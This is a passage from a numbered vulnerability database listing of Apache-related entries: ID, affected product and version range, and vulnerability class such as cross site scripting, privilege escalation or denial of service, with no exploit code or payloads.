11894| [81084] Apache Tomcat 6.0/7.0/8.0/9.0 ServletContext directory traversal
11895| [81083] Apache Tomcat 7.0/8.0/9.0 Index Page cross site request forgery
11896| [81082] Apache Tomcat 7.0/8.0/9.0 ResourceLinkFactory.setGlobalContext privilege escalation
11897| [81081] Apache Tomcat 6.0/7.0/8.0/9.0 Error information disclosure
11898| [81080] Apache Tomcat 6.0/7.0/8.0/9.0 Session Persistence privilege escalation
11899| [81079] Apache Tomcat 6.0/7.0/8.0/9.0 StatusManagerServlet information disclosure
11900| [81078] Apache Tomcat 7.0/8.0/9.0 Session privilege escalation
11901| [80970] Apache Solr up to 5.3.0 Admin UI plugins.js cross site scripting
11902| [80969] Apache Solr up to 5.2 Schema schema-browser.js cross site scripting
11903| [80968] Apache Solr up to 5.0 analysis.js cross site scripting
11904| [80940] HP Continuous Delivery Automation 1.30 Apache Commons Collections Library privilege escalation
11905| [80823] Apache CloudStack up to 4.5.1 KVM Virtual Machine Migration privilege escalation
11906| [80822] Apache CloudStack up to 4.5.1 API Call information disclosure
11907| [80778] Apache Camel up to 2.15.4/2.16.0 camel-xstream privilege escalation
11908| [80750] HPE Operations Manager 8.x/9.0 on Windows Apache Commons Collections Library privilege escalation
11909| [80724] Apache Hive up to 1.2.1 Authorization Framework privilege escalation
11910| [80577] Oracle Secure Global Desktop 4.63/4.71/5.2 Apache HTTP Server denial of service
11911| [80165] Intel McAfee ePolicy Orchestrator up to 4.6.9/5.0.3/5.3.1 Apache Commons Collections Library privilege escalation
11912| [80116] Apache Subversion up to 1.9.2 svn Protocol libsvn_ra_svn/marshal.c read_string memory corruption
11913| [80115] Apache ActiveMQ up to 5.12.x Broker Service privilege escalation
11914| [80036] IBM Cognos Business Intelligence Apache Commons Collections Library InvokerTransformer privilege escalation
11915| [79873] VMware vCenter Operations/vRealize Orchestrator Apache Commons Collections Library Serialized Java Object privilege escalation
11916| [79840] Apache Cordova File Transfer Plugin up to 1.2.x on Android unknown vulnerability
11917| [79839] Apache TomEE Serialized Java Stream EjbObjectInputStream privilege escalation
11918| [79791] Cisco Products Apache Commons Collections Library privilege escalation
11919| [79539] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
11920| [79538] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
11921| [79294] Apache Cordova-Android up to 3.6 BridgeSecret Random Generator weak encryption
11922| [79291] Apache Cordova-Android up to 4.0 Javascript Whitelist privilege escalation
11923| [79244] Apache CXF up to 2.7.17/3.0.7/3.1.2 SAML Web SSO Module SAML Response weak authentication
11924| [79243] Oracle WebLogic Server 10.3.6.0/12.1.2.0/12.1.3.0/12.2.1.0 WLS Security com.bea.core.apache.commons.collections.jar privilege escalation
11925| [78989] Apache Ambari up to 2.1.1 Open Redirect
11926| [78988] Apache Ambari up to 2.0.1/2.1.0 Password privilege escalation
11927| [78987] Apache Ambari up to 2.0.x cross site scripting
11928| [78986] Apache Ambari up to 2.0.x Proxy Endpoint api/v1/proxy privilege escalation
11929| [78780] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
11930| [78779] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
11931| [78778] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
11932| [78777] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
11933| [78776] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
11934| [78775] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
11935| [78774] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
11936| [78297] Apache Commons Components HttpClient up to 4.3.5 HTTPS Timeout denial of service
11937| [77406] Apache Flex BlazeDS AMF Message XML External Entity
11938| [77429] Apache ActiveMQ up to 5.10.0 LDAPLoginModule privilege escalation
11939| [77399] Apache ActiveMQ up to 5.10.0 LDAPLoginModule weak authentication
11940| [77375] Apache Tapestry up to 5.3.5 Client-Side Object Storage privilege escalation
11941| [77331] Apache ActiveMQ up to 5.11.1 on Windows Fileserver Upload/Download directory traversal
11942| [77299] Apache Solr Real-Time Module up to 7.x-1.1 Index Content information disclosure
11943| [77247] Apache ActiveMQ up to 5.10 TransportConnection.java processControlCommand denial of service
11944| [77083] Apache Groovy up to 2.4.3 MethodClosure.java MethodClosure memory corruption
11945| [76953] Apache Subversion 1.7.0/1.8.0/1.8.10 svn_repos_trace_node_locations information disclosure
11946| [76952] Apache Subversion 1.7.0/1.8.0/1.8.10 mod_authz_svn anonymous/authenticated information disclosure
11947| [76567] Apache Struts 2.3.20 unknown vulnerability
11948| [76733] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 ap_some_auth_required unknown vulnerability
11949| [76732] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 Request apr_brigade_flatten privilege escalation
11950| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
11951| [75690] Apache Camel up to 2.13.3/2.14.1 XPathBuilder.java XML External Entity
11952| [75689] Apache Camel up to 2.13.3/2.14.1 XML Converter Setup XmlConverter.java SAXSource privilege escalation
11953| [75668] Apache Sling API/Sling Servlets Post up to 2.2.1 HtmlResponse cross site scripting
11954| [75601] Apache Jackrabbit up to 2.10.0 WebDAV Request XML External Entity
11955| [75420] Apache Tomcat up to 6.0.43/7.0.58/8.0.16 Security Manager privilege escalation
11956| [75145] Apache OpenOffice up to 4.1.1 HWP Filter Crash denial of service
11957| [75032] Apache Tomcat Connectors up to 1.2.40 mod_jk privilege escalation
11958| [75135] PHP 5.4/5.5 HTTP Request sapi_apache2.c apache2handler privilege escalation
11959| [74793] Apache Tomcat File Upload denial of service
11960| [74708] Apple MacOS X up to 10.10.2 Apache denial of service
11961| [74707] Apple MacOS X up to 10.10.2 Apache denial of service
11962| [74706] Apple MacOS X up to 10.10.2 Apache memory corruption
11963| [74705] Apple MacOS X up to 10.10.2 Apache denial of service
11964| [74704] Apple MacOS X up to 10.10.2 Apache denial of service
11965| [74703] Apple MacOS X up to 10.10.2 Apache denial of service
11966| [74702] Apple MacOS X up to 10.10.2 Apache denial of service
11967| [74701] Apple MacOS X up to 10.10.2 Apache cross site request forgery
11968| [74700] Apple MacOS X up to 10.10.2 Apache unknown vulnerability
11969| [74661] Apache Flex up to 4.14.0 asdoc index.html cross site scripting
11970| [74609] Apache Cassandra up to 1.2.19/2.0.13/2.1.3 JMX/RMI Interface privilege escalation
11971| [74469] Apache Xerces-C up to 7.0 internal/XMLReader.cpp denial of service
11972| [74468] Apache Batik up to 1.6 denial of service
11973| [74414] Apache Mod-gnutls up to 0.5.1 Authentication spoofing
11974| [74371] Apache Standard Taglibs up to 1.2.0 memory corruption
11975| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
11976| [74174] Apache WSS4J up to 2.0.0 privilege escalation
11977| [74172] Apache ActiveMQ up to 5.5.0 Administration Console cross site scripting
11978| [69092] Apache Tomcat up to 6.0.42/7.0.54/8.0.8 HTTP Request Smuggling privilege escalation
11979| [73831] Apache Qpid up to 0.30 Access Restriction unknown vulnerability
11980| [73731] Apache XML Security unknown vulnerability
11981| [68660] Oracle BI Publisher 10.1.3.4.2/11.1.1.7 Apache Tomcat cross site scripting
11982| [73659] Apache CloudStack up to 4.3.0 Stack-Based unknown vulnerability
11983| [73593] Apache Traffic Server up to 5.1.0 denial of service
11984| [73511] Apache POI up to 3.10 Deadlock denial of service
11985| [73510] Apache Solr up to 4.3.0 cross site scripting
11986| [68447] Apache Subversion up to 1.7.18/1.8.10 mod_dav_svn Crash denial of service
11987| [68446] Apache Subversion up to 1.7.18/1.8.10 REPORT Request Crash denial of service
11988| [73173] Apache CloudStack Stack-Based unknown vulnerability
11989| [68357] Apache Struts up to 2.3.16.3 Random Number Generator cross site request forgery
11990| [73106] Apache Hadoop up to 2.4.0 Symlink privilege escalation
11991| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
11992| [72890] Apache Qpid 0.30 unknown vulnerability
11993| [72887] Apache Hive 0.13.0 File Permission privilege escalation
11994| [72878] Apache Cordova 3.5.0 cross site request forgery
11995| [72877] Apache Cordova 3.5.0 cross site request forgery
11996| [72876] Apache Cordova 3.5.0 cross site request forgery
11997| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
11998| [68065] Apache CXF up to 3.0.1 JAX-RS SAML denial of service
11999| [68064] Apache CXF up to 3.0.0 SAML Token denial of service
12000| [67913] Oracle Retail Markdown Optimization 12.0/13.0/13.1/13.2/13.4 Apache commons-beanutils-1.8.0.jar memory corruption
12001| [67912] Oracle Retail Invoice Matching up to 14.0 Apache commons-beanutils-1.8.0.jar memory corruption
12002| [67911] Oracle Retail Clearance Optimization Engine 13.3/13.4/14.0 Apache commons-beanutils-1.8.0.jar memory corruption
12003| [67910] Oracle Retail Allocation up to 13.2 Apache commons-beanutils-1.8.0.jar memory corruption
12004| [71835] Apache Shiro 1.0.0/1.1.0/1.2.0/1.2.1/1.2.2 unknown vulnerability
12005| [71633] Apachefriends XAMPP 1.8.1 cross site scripting
12006| [71629] Apache Axis2/C spoofing
12007| [67633] Apple Mac OS X up to 10.9.4 apache_mod_php ext/standard/dns.c dns_get_record memory corruption
12008| [67631] Apple Mac OS X up to 10.9.4 apache_mod_php Symlink memory corruption
12009| [67630] Apple Mac OS X up to 10.9.4 apache_mod_php cdf_read_property_info denial of service
12010| [67629] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_count_chain denial of service
12011| [67628] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_check_stream_offset denial of service
12012| [67627] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c mconvert memory corruption
12013| [67626] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c denial of service
12014| [67625] Apple Mac OS X up to 10.9.4 apache_mod_php Crash denial of service
12015| [67624] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_property_info denial of service
12016| [67623] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_unpack_summary_info denial of service
12017| [67622] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_short_sector denial of service
12018| [67620] Apple Mac OS X up to 10.9.4 apache_mod_php magic/Magdir/commands denial of service
12019| [67790] Apache HTTP Server mod_cache NULL Pointer Dereference denial of service
12020| [67522] Apache Tomcat up to 7.0.39 JSP Upload privilege escalation
12021| [70809] Apache POI up to 3.11 Crash denial of service
12022| [70808] Apache POI up to 3.10 unknown vulnerability
12023| [70806] Apache Commons-httpclient 4.2/4.2.1/4.2.2 spoofing
12024| [70749] Apache Axis up to 1.4 getCN spoofing
12025| [70701] Apache Traffic Server up to 3.3.5 denial of service
12026| [70700] Apache OFBiz up to 12.04.03 cross site scripting
12027| [67402] Apache OpenOffice 4.0.0/4.0.1/4.1.0 Calc privilege escalation
12028| [67401] Apache OpenOffice up to 4.1.0 OLE Object information disclosure
12029| [70661] Apache Subversion up to 1.6.17 denial of service
12030| [70660] Apache Subversion up to 1.6.17 spoofing
12031| [70659] Apache Subversion up to 1.6.17 spoofing
12032| [67183] Apache HTTP Server up to 2.4.9 mod_proxy denial of service
12033| [67180] Apache HTTP Server up to 2.4.9 WinNT MPM Memory Leak denial of service
12034| [67185] Apache HTTP Server up to 2.4.9 mod_status Heap-Based memory corruption
12035| [67184] Apache HTTP Server 2.4.5/2.4.6 mod_cache NULL Pointer Dereference denial of service
12036| [67182] Apache HTTP Server up to 2.4.9 mod_deflate Memory Consumption denial of service
12037| [67181] Apache HTTP Server up to 2.4.9 mod_cgid denial of service
12038| [70338] Apache Syncope up to 1.1.7 unknown vulnerability
12039| [70295] Apache CXF up to 2.7.9 Cleartext information disclosure
12040| [70106] Apache Open For Business Project up to 10.04.0 getServerError cross site scripting
12041| [70105] Apache MyFaces up to 2.1.5 JavaServer Faces directory traversal
12042| [69846] Apache HBase up to 0.94.8 information disclosure
12043| [69783] Apache CouchDB up to 1.2.0 memory corruption
12044| [13383] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 XML Parser privilege escalation
12045| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation
12046| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
12047| [13164] Apache CXF up to 2.6.13/2.7.10 SOAP OutgoingChainInterceptor.java Invalid Content denial of service
12048| [13163] Apache CXF up to 2.6.13/2.7.10 SOAP HTML Content denial of service
12049| [13158] Apache Struts up to 2.3.16.2 ParametersInterceptor getClass privilege escalation
12050| [69515] Apache Struts up to 2.3.15.0 CookieInterceptor memory corruption
12051| [13086] Apache Struts up to 1.3.10 Class Loader privilege escalation
12052| [13067] Apache Struts up to 2.3.16.1 Class Loader privilege escalation
12053| [69431] Apache Archiva up to 1.3.6 cross site scripting
12054| [69385] Apache Syncope up to 1.1.6 unknown vulnerability
12055| [69338] Apache Xalan-Java up to 2.7.1 system-property unknown vulnerability
12056| [12742] Trustwave ModSecurity up to 2.7.5 Chunk Extension apache2/modsecurity.c modsecurity_tx_init privilege escalation
12057| [12741] Trustwave ModSecurity up to 2.7.6 Chunked HTTP Transfer apache2/modsecurity.c modsecurity_tx_init Trailing Header privilege escalation
12058| [13387] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Content-Length Header privilege escalation
12059| [13386] Apache Tomcat Security Manager up to 6.0.39/7.0.53/8.0.5 XSLT privilege escalation
12060| [13385] Apache Tomcat 8.0.0/8.0.1/8.0.3 AJP Request Zero Length denial of service
12061| [13384] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Chunked HTTP Request denial of service
12062| [12748] Apache CouchDB 1.5.0 UUIDS /_uuids denial of service
12063| [66739] Apache Camel up to 2.12.2 unknown vulnerability
12064| [66738] Apache Camel up to 2.12.2 unknown vulnerability
12065| [12667] Apache HTTP Server 2.4.7 mod_log_config.c log_cookie denial of service
12066| [66695] Apache CouchDB up to 1.2.0 cross site scripting
12067| [66694] Apache CouchDB up to 1.2.0 Partition partition2 directory traversal
12068| [66689] Apache HTTP Server up to 2.0.33 mod_dav dav_xml_get_cdata denial of service
12069| [12518] Apache Tomcat up to 6.0.38/7.0.49/8.0.0-RC9 HTTP Header denial of service
12070| [66498] Apache expressions up to 3.3.0 Whitelist unknown vulnerability
12071| [12781] Apache Struts up to 2.3.8 ParametersInterceptor getClass denial of service
12072| [12439] Apache Tomcat 6.0.33 XML XXE information disclosure
12073| [12438] Apache Tomcat 6.0.33/6.0.34/6.0.35/6.0.36/6.0.37 coyoteadapter.java disableURLRewriting privilege escalation
12074| [66356] Apache Wicket up to 6.8.0 information disclosure
12075| [12209] Apache Tomcat 7.0.0/7.0.50/8.0.0-RC1/8.0.1 Content-Type Header for Multi-Part Request Infinite Loop denial of service
12076| [66322] Apache ActiveMQ up to 5.8.0 cross site scripting
12077| [12291] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
12078| [66255] Apache Open For Business Project up to 10.04.3 cross site scripting
12079| [66200] Apache Hadoop up to 2.0.5 Security Feature information disclosure
12080| [66072] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
12081| [66068] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
12082| [11928] Oracle Secure Global Desktop up to 4.71 Apache Tomcat unknown vulnerability
12083| [11924] Oracle Secure Global Desktop up to 4.63 Apache Tomcat denial of service
12084| [11922] Oracle Secure Global Desktop up to 4.63 Apache Tomcat unknown vulnerability
12085| [66049] Apache XML Security for Java up to 1.4.6 Memory Consumption denial of service
12086| [12199] Apache Subversion up to 1.8.5 mod_dav_svn/repos.c get_resource denial of service
12087| [65946] askapache Firefox Adsense up to 3.0 askapache-firefox-adsense.php cross site request forgery
12088| [65668] Apache Solr 4.0.0 Updater denial of service
12089| [65665] Apache Solr up to 4.3.0 denial of service
12090| [65664] Apache Solr 3.6.0/3.6.1/3.6.2/4.0.0 Updater denial of service
12091| [65663] Apache Solr up to 4.5.1 ResourceLoader directory traversal
12092| [65658] Apache roller 4.0/4.0.1/5.0/5.0.1 unknown vulnerability
12093| [65657] Apache Roller 4.0/4.0.1/5.0/5.0.1 cross site scripting
12094| [11325] Apache Subversion 1.7.13 mod_dontdothat Bypass denial of service
12095| [11324] Apache Subversion up to 1.8.4 mod_dav_svn denial of service
12096| [11098] Apache Tomcat 5.5.25 HTTP Request cross site request forgery
12097| [65410] Apache Struts 2.3.15.3 cross site scripting
12098| [65386] Apache Solr up to 2.2.1 on TYPO3 cross site scripting
12099| [65385] Apache Solr up to 2.2.1 on TYPO3 unknown vulnerability
12100| [11044] Apache Struts 2.3.15.3 showConfig.action cross site scripting
12101| [11043] Apache Struts 2.3.15.3 actionNames.action cross site scripting
12102| [11018] cPanel WHM up to 11.40.0.11 Apache mod_userdir Tweak Interface privilege escalation
12103| [65342] Apache Sling 1.0.2/1.0.4/1.0.6/1.1.0/1.1.2 Auth Core cross site scripting
12104| [65340] Apache Shindig 2.5.0 information disclosure
12105| [65316] Apache Mod Fcgid up to 2.3.7 mod_fcgid fcgid_bucket.c fcgid_header_bucket_read memory corruption
12106| [65313] Apache Sling 2.2.0/2.3.0 AbstractCreateOperation.java deepGetOrCreateNode denial of service
12107| [10826] Apache Struts 2 File privilege escalation
12108| [65204] Apache Camel up to 2.10.1 unknown vulnerability
12109| [10460] Apache Struts 2.0.0/2.3.15.1 Action Mapping Mechanism Bypass privilege escalation
12110| [10459] Apache Struts 2.0.0/2.3.15 Dynamic Method Invocation unknown vulnerability
12111| [10160] Apache Subversion 1.8.0/1.8.1/1.8.2 svnwcsub.py handle_options race condition
12112| [10159] Apache Subversion up to 1.8.2 svnserve write_pid_file race condition
12113| [10158] Apache Subversion 1.8.0/1.8.1/1.8.2 daemonize.py daemon::daemonize race condition
12114| [10157] Apache Subversion up to 1.8.1 FSFS Repository Symlink privilege escalation
12115| [64808] Fail2ban up to 0.8.9 apache-auth.conf denial of service
12116| [64760] Best Practical RT up to 4.0.12 Apache::Session::File information disclosure
12117| [64722] Apache XML Security for C++ Heap-based memory corruption
12118| [64719] Apache XML Security for C++ Heap-based memory corruption
12119| [64718] Apache XML Security for C++ verify denial of service
12120| [64717] Apache XML Security for C++ getURIBaseTXFM memory corruption
12121| [64716] Apache XML Security for C++ spoofing
12122| [64701] Apache CXF up to 2.7.3 XML Parser Memory Consumption denial of service
12123| [64700] Apache CloudStack up to 4.1.0 Stack-Based cross site scripting
12124| [64667] Apache Open For Business Project up to 10.04.04 unknown vulnerability
12125| [64666] Apache Open For Business Project up to 10.04.04 cross site scripting
12126| [9891] Apache HTTP Server 2.2.22 suEXEC Feature .htaccess information disclosure
12127| [64509] Apache ActiveMQ up to 5.8.0 scheduled.jsp cross site scripting
12128| [9826] Apache Subversion up to 1.8.0 mod_dav_svn denial of service
12129| [9683] Apache HTTP Server 2.4.5 mod_session_dbd denial of service
12130| [64485] Apache Struts up to 2.2.3.0 privilege escalation
12131| [9568] Apache Struts up to 2.3.15 DefaultActionMapper cross site request forgery
12132| [9567] Apache Struts up to 2.3.15 DefaultActionMapper memory corruption
12133| [64467] Apache Geronimo 3.0 memory corruption
12134| [64466] Apache OpenJPA up to 2.2.1 Serialization memory corruption
12135| [64457] Apache Struts up to 2.2.3.0 cross site scripting
12136| [64326] Alejandro Garza Apachesolr Autocomplete up to 7.x-1.1 cross site scripting
12137| [9184] Apache Qpid up to 0.20 SSL misconfiguration
12138| [8935] Apache Subversion up to 1.7.9 FSFS Format Repository denial of service
12139| [8934] Apache Subversion up to 1.7.9 Svnserve Server denial of service
12140| [8933] Apache Subversion up to 1.6.21 check-mime-type.pl svnlook memory corruption
12141| [8932] Apache Subversion up to 1.6.21 svn-keyword-check.pl svnlook changed memory corruption
12142| [9022] Apache Struts up to 2.3.14.2 OGNL Expression memory corruption
12143| [8873] Apache Struts 2.3.14 privilege escalation
12144| [8872] Apache Struts 2.3.14 privilege escalation
12145| [8746] Apache HTTP Server Log File Terminal Escape Sequence Filtering mod_rewrite.c do_rewritelog privilege escalation
12146| [8666] Apache Tomcat up to 7.0.32 AsyncListener information disclosure
12147| [8665] Apache Tomcat up to 7.0.29 Chunked Transfer Encoding Extension Size denial of service
12148| [8664] Apache Tomcat up to 7.0.32 FORM Authentication weak authentication
12149| [64075] Apache Subversion up to 1.7.7 mod_dav_svn Crash denial of service
12150| [64074] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
12151| [64073] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
12152| [64072] Apache Subversion up to 1.7.7 mod_dav_svn NULL Pointer Dereference denial of service
12153| [64071] Apache Subversion up to 1.7.8 mod_dav_svn Memory Consumption denial of service
12154| [8768] Apache Struts up to 2.3.14 on Mac EL and OGNL Interpreter memory corruption
12155| [64006] Apache ActiveMQ up to 5.7.0 denial of service
12156| [64005] Apache ActiveMQ up to 5.7.0 Default Configuration denial of service
12157| [64004] Apache ActiveMQ up to 5.7.0 PortfolioPublishServlet.java cross site scripting
12158| [8427] Apache Tomcat Session Transaction weak authentication
12159| [63960] Apache Maven 3.0.4 Default Configuration spoofing
12160| [63751] Apache qpid up to 0.20 qpid::framing::Buffer denial of service
12161| [63750] Apache qpid up to 0.20 checkAvailable denial of service
12162| [63749] Apache Qpid up to 0.20 Memory Consumption denial of service
12163| [63748] Apache Qpid up to 0.20 Default Configuration denial of service
12164| [63747] Apache Rave up to 0.20 User Account information disclosure
12165| [7889] Apache Subversion up to 1.6.17 mod_dav_svn/svn_fs_file_length() denial of service
12166| [63646] Apache HTTP Server up to 2.2.23/2.4.3 mod_proxy_balancer.c balancer_handler cross site scripting
12167| [7688] Apache CXF up to 2.7.1 WSS4JInterceptor Bypass weak authentication
12168| [7687] Apache CXF up to 2.7.2 Token weak authentication
12169| [63334] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
12170| [63299] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
12171| [7202] Apache HTTP Server 2.4.2 on Oracle Solaris ld_library_path cross site scripting
12172| [7075] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector NioEndpoint.java denial of service
12173| [7074] Apache Tomcat up to 6.0.35/7.0.29 FORM Authentication RealmBase.java weak authentication
12174| [7073] Apache Tomcat up to 6.0.35/7.0.31 CSRF Prevention Filter cross site request forgery
12175| [63090] Apache Tomcat up to 4.1.24 denial of service
12176| [63089] Apache HTTP Server up to 2.2.13 mod_proxy_ajp denial of service
12177| [62933] Apache Tomcat up to 5.5.0 Access Restriction unknown vulnerability
12178| [62929] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector Memory Consumption denial of service
12179| [62833] Apache CXF -/2.6.0 spoofing
12180| [62832] Apache Axis2 up to 1.6.2 spoofing
12181| [62831] Apache Axis up to 1.4 Java Message Service spoofing
12182| [62830] Apache Commons-httpclient 3.0 Payments spoofing
12183| [62826] Apache Libcloud up to 0.11.0 spoofing
12184| [62757] Apache Open For Business Project up to 10.04.0 unknown vulnerability
12185| [8830] Red Hat JBoss Enterprise Application Platform 6.0.1 org.apache.catalina.connector.Response.encodeURL information disclosure
12186| [62661] Apache Axis2 unknown vulnerability
12187| [62658] Apache Axis2 unknown vulnerability
12188| [62467] Apache Qpid up to 0.17 denial of service
12189| [62417] Apache CXF 2.4.7/2.4.8/2.5.3/2.5.4/2.6.1 spoofing
12190| [6301] Apache HTTP Server mod_pagespeed cross site scripting
12191| [6300] Apache HTTP Server mod_pagespeed Hostname information disclosure
12192| [6123] Apache Wicket up to 1.5.7 Ajax Link cross site scripting
12193| [62035] Apache Struts up to 2.3.4 denial of service
12194| [61916] Apache QPID 0.5/0.6/0.14/0.16 unknown vulnerability
12195| [6998] Apache Tomcat 5.5.35/6.0.35/7.0.28 DIGEST Authentication Session State Caching privilege escalation
12196| [6997] Apache Tomcat 5.5.35/6.0.35/7.0.28 HTTP Digest Authentication Implementation privilege escalation
12197| [6092] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_ajp.c information disclosure
12198| [6090] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_http.c information disclosure
12199| [61507] Apache POI up to 3.8 UnhandledDataStructure denial of service
12200| [6070] Apache Struts up to 2.3.4 Token Name Configuration Parameter privilege escalation
12201| [6069] Apache Struts up to 2.3.4 Request Parameter OGNL Expression denial of service
12202| [5764] Oracle Solaris 10 Apache HTTP Server information disclosure
12203| [5700] Oracle Secure Backup 10.3.0.3/10.4.0.1 Apache denial of service
12204| [61255] Apache Hadoop 2.0.0 Kerberos unknown vulnerability
12205| [61229] Apache Sling up to 2.1.1 denial of service
12206| [61152] Apache Commons-compress 1.0/1.1/1.2/1.3/1.4 denial of service
12207| [61094] Apache Roller up to 5.0 cross site scripting
12208| [61093] Apache Roller up to 5.0 cross site request forgery
12209| [61005] Apache OpenOffice 3.3/3.4 unknown vulnerability
12210| [9673] Apache HTTP Server up to 2.4.4 mod_dav mod_dav.c Request denial of service
12211| [5436] Apache OpenOffice 3.3/3.4 WPXContentListener.cpp _closeTableRow File memory corruption
12212| [5435] Apache OpenOffice 3.3/3.4 vclmi.dll File memory corruption
12213| [60730] PHP 5.4.0/5.4.1/5.4.2 apache_request_headers memory corruption
12214| [60708] Apache Qpid 0.12 unknown vulnerability
12215| [5032] Apache Hadoop up to 0.20.205.0/1.0.1/0.23.1 Kerberos/MapReduce Security Feature privilege escalation
12216| [4949] Apache Struts File Upload XSLTResult.java XSLT File privilege escalation
12217| [4955] Apache Traffic Server 3.0.3/3.1.2 HTTP Header Parser memory corruption
12218| [4882] Apache Wicket up to 1.5.4 directory traversal
12219| [4881] Apache Wicket up to 1.4.19 cross site scripting
12220| [4884] Apache HTTP Server up to 2.3.6 mod_fcgid fcgid_spawn_ctl.c FcgidMaxProcessesPerClass HTTP Requests denial of service
12221| [60352] Apache Struts up to 2.2.3 memory corruption
12222| [60153] Apache Portable Runtime up to 1.4.3 denial of service
12223| [4598] Apache Struts 1.3.10 upload-submit.do cross site scripting
12224| [4597] Apache Struts 1.3.10 processSimple.do cross site scripting
12225| [4596] Apache Struts 2.0.14/2.2.3 struts2-rest-showcase/orders cross site scripting
12226| [4595] Apache Struts 2.0.14/2.2.3 struts2-showcase/person/editPerson.action cross site scripting
12227| [4583] Apache HTTP Server up to 2.2.21 Threaded MPM denial of service
12228| [4582] Apache HTTP Server up to 2.2.21 protocol.c information disclosure
12229| [4571] Apache Struts up to 2.3.1.2 privilege escalation
12230| [4557] Apache Tomcat up to 7.0.21 Caching/Recycling information disclosure
12231| [59934] Apache Tomcat up to 6.0.9 DigestAuthenticator.java unknown vulnerability
12232| [59933] Apache Tomcat up to 6.0.9 Access Restriction unknown vulnerability
12233| [59932] Apache Tomcat up to 6.0.9 unknown vulnerability
12234| [59931] Apache Tomcat up to 6.0.9 Access Restriction information disclosure
12235| [59902] Apache Struts up to 2.2.3 Interfaces unknown vulnerability
12236| [4528] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
12237| [4527] Apache Struts up to 2.2.3 ExceptionDelegator cross site scripting
12238| [59888] Apache Tomcat up to 6.0.6 denial of service
12239| [59886] Apache ActiveMQ up to 5.5.1 Crash denial of service
12240| [4513] Apache Struts up to 2.3.1 ParameterInterceptor directory traversal
12241| [4512] Apache Struts up to 2.2.3 CookieInterceptor privilege escalation
12242| [59850] Apache Geronimo up to 2.2.1 denial of service
12243| [59825] Apache HTTP Server up to 2.1.7 mod_reqtimeout denial of service
12244| [59556] Apache HTTP Server up to 2.0.53 mod_proxy information disclosure
12245| [58467] Apache libcloud 0.2.0/0.3.0/0.3.1/0.4.0 Access Restriction spoofing
12246| [58413] Apache Tomcat up to 6.0.10 spoofing
12247| [58381] Apache Wicket up to 1.4.17 cross site scripting
12248| [58296] Apache Tomcat up to 7.0.19 unknown vulnerability
12249| [57888] Apache HttpClient 4.0/4.0.1/4.1 Authorization information disclosure
12250| [57587] Apache Subversion up to 1.6.16 mod_dav_svn information disclosure
12251| [57585] Apache Subversion up to 1.6.16 mod_dav_svn Memory Consumption denial of service
12252| [57584] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
12253| [57577] Apache Rampart-C 1.3.0 Access Restriction rampart_timestamp_token_validate privilege escalation
12254| [57568] Apache Archiva up to 1.3.4 cross site scripting
12255| [57567] Apache Archiva up to 1.3.4 cross site request forgery
12256| [57481] Apache Tomcat 7.0.12/7.0.13 Access Restriction unknown vulnerability
12257| [4355] Apache HTTP Server APR apr_fnmatch denial of service
12258| [57435] Apache Struts up to 2.2.1.1 FileHandler.java cross site scripting
12259| [57425] Apache Struts up to 2.2.1.1 cross site scripting
12260| [4352] Apache HTTP Server 2.2.x APR apr_fnmatch denial of service
12261| [57025] Apache Tomcat up to 7.0.11 information disclosure
12262| [57024] Apache Tomcat 7.0.11 Access Restriction information disclosure
12263| [56774] IBM WebSphere Application Server up to 7.0.0.14 org.apache.jasper.runtime.JspWriterImpl.response denial of service
12264| [56824] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
12265| [56832] Apache Tomcat up to 7.0.10 Access Restriction information disclosure
12266| [56830] Apache Tomcat up to 7.0.9 Access Restriction privilege escalation
12267| [12440] Apache Tomcat 6.0.33 Malicious Request cross site scripting
12268| [56512] Apache Continuum up to 1.4.0 cross site scripting
12269| [4285] Apache Tomcat 5.x JVM getLocale denial of service
12270| [4284] Apache Tomcat 5.x HTML Manager Infinite Loop cross site scripting
12271| [4283] Apache Tomcat 5.x ServletContect privilege escalation
12272| [56441] Apache Tomcat up to 7.0.6 denial of service
12273| [56300] Apache CouchDB up to 1.0.1 Web Administration Interface cross site scripting
